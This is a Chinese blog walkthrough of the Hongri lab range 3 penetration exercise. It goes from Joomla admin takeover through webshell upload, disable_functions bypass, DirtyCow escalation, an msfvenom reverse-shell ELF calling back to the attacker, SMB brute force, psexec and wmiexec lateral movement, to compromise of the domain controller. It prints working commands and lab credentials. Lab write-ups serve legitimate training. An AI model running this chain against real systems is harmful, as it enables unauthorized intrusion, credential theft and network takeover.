首页 > 其他分享 >红日靶场三攻略

红日靶场三攻略

时间:2024-07-13 15:10:24浏览次数:16  
标签:红日 administrator set 发现 主机 192.168 然后 攻略 靶场

一、所需环境配置
web-centos(双网卡)其余全是单网卡
双网卡配置

centos切换网络时需要重启网卡
命令:/etc/init.d/network restart

其余全是仅主机模式

网络拓扑

二、信息收集
1、主机存活探测
arp-scan -l

发现目标主机
2、端口扫描
nmap -sS -sV -A -p- ip

发现开启了80、22、3306端口
3、使用fscan做简单的漏洞扫描

发现爆出一个数据库的账户密码 root 123
4、站点的目录扫描

python3 dirsearch.py -u http://192.168.2.131/

发现扫出了许多目录,然后就是逐个点击,然后发现administrator目录

发现是一个管理员后台登陆页面,而且还是joomla框架的,尝试弱口令发现行不通,那就先放一边。
然后再看了一下其它的目录,其中/configuration.php~ 有一些敏感信息

发现此处泄露了数据库的一个账户密码以及数据库名,接着就是尝试连接数据库获取数据库里面的用户账号
使用远程连接数据库工具(NAVICAT)

连接成功,然后查找am2zu_user表

然后发现密码是通过哈希加密的,然后解密不了,然后就是通过sql语句对其账户密码进行更改
update am2zu_users set password=md5(123456) where id=891;

然后尝试登陆

登陆成功,然后就是通过写文件getshell
三、渗透
1、写马

该模块内随便一个文件里面写一个一句话木马

然后尝试访问目录判断一下是否写马成功


发现写马成功,然后就是通过蚁剑直接连接就行

连接成功

然后发现在终端上输入命令都无法执行,说明一点就是系统命令被禁用了,然后通过phpinfo显示信息可以看出

是disable_functions限制的,然后就是尝试绕过
2、绕过disable_functions
使用蚁剑里面的插件进行绕过



成功绕过,命令也可以执行了
3、bypass_disablefunc_via_LD_PRELOAD绕过
文件下载:git clone https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD.git
将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/ ,我上传的时候将其重命名了

然后将bypass_disablefunc_x64.so放在/tmp目录下

接着就是构造payload
http://192.168.2.131/a.php?cmd=pwd&outpath=/tmp/123&sopath=/tmp/b.so

然后查看了一下IP

发现出现的IP与自己的不一样,然后尝试一下ping外网

发现目标机器不出网,然后看一下端口连接情况

发现93.120的80端口与93.100的43670端口进行连接,说明此处存在反向代理
然后在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx
由于我的环境里面没在/tmp/找到mysql文件,但是正常情况下是存在的

然后理一下mysql账号密码
root/123 wwwuser/wwwuser_123Aqx testuser/cvcvgjASD!@
4、ssh连接

wwwuser/wwwuser_123Aqx 这个账户连接成功,其余两个不行
5、提权
使用find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' ; 2>/dev/null 命令语句查看一下存在root权限的文件发现执行之后没有反应
然后就是通过查看一下系统版本

发现版本稍微老一点,可以尝试一下脏牛提权
下载地址:https://github.com/firefart/dirtycow
然后通过在本地开启http服务,让目标靶机远程下载该文件

然后将下载的文件编译一下
gcc -pthread dirty.c -o dirty -lcrypt

接着执行编译过的文件

然后设置好密码后就进行登陆

发现提权成功8
四、msf后门上线
1、使用msfvenom生成elf木马文件
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.2.130 lport=7749 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf -o web.elf

然后继续远程下载

2、msf开启监听模块
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 7749
lport => 7749
msf6 exploit(multi/handler) > set lhost 192.168.2.130
lhost => 192.168.2.130
msf6 exploit(multi/handler) > run
执行目标文件

shell获得成功
五、内网爆破
1、配置路由
run autoroute -s 192.168.93.0/24
run autoroute -p --> 查看路由配置情况

2、扫描内网的主机
use auxiliary/scanner/smb/smb_version
set rhost 192.168.93.0/24
set threads 20 --> 线程数


发现内网存活的主机有三台:93.10 93.20 93.30
3、爆破主机
use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.0/24
set smbuser administrator (用户名)
set pass_file /home/tools/shell.txt (字典)
set threads 20 (线程)
run


通过爆破得到内网主机的密码
192.168.93.30 administrator:123qwe!ASD
192.168.93.20 administrator:123qwe!ASD
192.168.93.10 administrator:zxcASDqw123!!
4、使用psexec模块
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set payload windows/x64/meterpreter/bind_tcp
set SMBUser administrator
set smbpass 123qwe!ASD
run

成功反弹shell

发现域名,然后尝试ping一下

发现是10,说明这个主机应该是域控DC
打开3389端口服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

六、内网穿透
1、设置隧道代理
use server/socks_proxy
set srvhost 192.168.2.130
run -j -z



成功远程登陆,进行一些信息收集
2、使用wmiexec工具
下载地址:https://github.com/XiaoliChan/wmiexec-Pro
proxychains4 python3 wmiexec-pro.py 'administrator:[email protected]' exec-command -shell

直接获取控制权
查看域用户
net user /domian

查看域内所有主机
net group "domain computers" /domain

查看域管理员
net group "domain admins" /domain

查看域控
net group "domain controllers" /domain

爬取密码

接着就是横向域控
proxychains4 python3 wmiexec-pro.py 'administrator:[email protected]' exec-command -shell

直接接管域控
查看信息再次确认一下

已经确认10是域控,成功拿下

标签:红日,administrator,set,发现,主机,192.168,然后,攻略,靶场
From: https://www.cnblogs.com/hacksun/p/18299836

相关文章

  • 电脑按哪几个键可以录制屏幕?录屏软件与快捷键全攻略
    在这个信息爆炸、技术日新月异的时代,屏幕捕捉已成为我们记录和分享知识、娱乐和创意的重要手段。无论是制作教学视频、直播游戏实况,还是记录工作流程,一款得心应手的录屏软件是必不可少的。本文将带您深入了解不同操作系统的录屏功能,以及第三方录屏软件的强大之处,让您的屏幕捕捉......
  • 红日靶场2-渗透过程
    一、环境搭建注意:靶机通用密码:1qaz@WSX这里设置两个网卡三台虚拟机配置如下:kali机:192.168.230.131(VMnet8网卡随机分配的IP)PC机:192.168.230.201(外网ip),10.10.10.201(内网ip)DC机:10.10.10.10(域控)WEB机:192.168.230.80(外网),10.10.10.80(内网)(1)PC机配置PC端虚拟机相当于网关服......
  • upload-labs靶场全题解
    ​​靶场搭建对php和apache版本有严格要求,建议使用phpstudy2018并且使用设置php版本为5.2.17,这个靶场比较老了,如果要复现的话,必要严格按照要求来使用,博主使用最新版的phpstudy在某些靶场上未能成功复现,所以浪费了很多时间。。。。。Upload-Labs环境要求操作系统:wind......
  • Keil5深度探索:高效生成hex、bin与lib文件全攻略
    前言Keil5是一款非常强大的嵌入式开发工具,它支持多种处理器和开发板,包括ARMCortex-M系列。在嵌入式开发中,生成hex、bin和lib文件是非常常见的需求。本文将详细介绍如何使用Keil5高效生成这些文件。原因1.用到IAP升级,需要bin文件2.给别人分享源代码,不想让别人看到源代码......
  • 这份 Stable diffusion 提示词攻略,记得收好了!
    大家好,今天给大家分享的是关于Stablediffusion提示词的基础和进阶语法,为什么有必要了解这个呢?首先是提示词对出图效果影响很大,了解提示词的用法有助于我们写出更优秀的提示词;其次就是我们可能会去C站拷贝别人的提示词,虽然直接拷贝过来也能得到不错的效果,但这样只会“知其......
  • AI绘画商业实战| 深入剖析儿童绘本AI绘画商业变现攻略!
    前言其实通过AI绘画来完成儿童绘本的插画部分,只是整个儿童绘本创意设计的其中一个环节。想要完整的做完一套儿童绘本,需要体系化的思考、创意、设计和制作,本期我们就简单聊一下整个闭环。一、确定目标受众和主题风格做儿童绘本首先要明确的是目标受众的年龄段,这决定了主......
  • sqli-labs靶场第一关过关教程(保姆级教程:不是新手别进)
    SQL注入漏洞概述1、什么是SQL注入漏洞SQL注入漏洞是一个web层面的安全漏洞,web应用与数据库存在交互点,攻击者构建恶意SQL语句,欺骗数据库服务器执行非授权的查询。2、如何判断网页是否存在SQL注入漏洞1、web页面与数据库是否存在交互点,这个交互点就是注入点常见注入点:URL和......
  • 生产实习--启明星辰 第三天(文件漏洞的实战,靶场和phpstudy环境的配置)
    环境的下载与配置在这次实践中会用到,phpstudy,burpsuite以及靶场upload-labs。对于burpsuite的配置可以参照下面这篇文章。burpsuite的安装与配置-CSDN博客对于phpstudy,我们首先进入官网(Windows版phpstudy下载-小皮面板(phpstudy)(xp.cn))进行下载,最好是下载2018的版本......
  • 解码特征的力量:SKlearn中特征重要性评估全攻略
    解码特征的力量:SKlearn中特征重要性评估全攻略在机器学习模型的开发过程中,理解各个特征对预测结果的贡献度是至关重要的。特征重要性评估不仅可以帮助我们识别最有影响力的特征,还可以用于模型解释和简化。Scikit-learn(简称sklearn),作为Python中一个功能丰富的机器学习库,提供......
  • 自动化测试全攻略:从入门到精通!
    1、自动化测试专栏随着技术的发展和工作需求的增长,自动化测试已成为软件质量保障体系中不可或缺的一环。为了帮助广大测试工程师、开发者和对自动化测试感兴趣的读者们更好地掌握这一技能,今年特别推出了全新的《自动化测试全攻略:从入门到精通!》专栏,希望能为大家提供一份全面、系......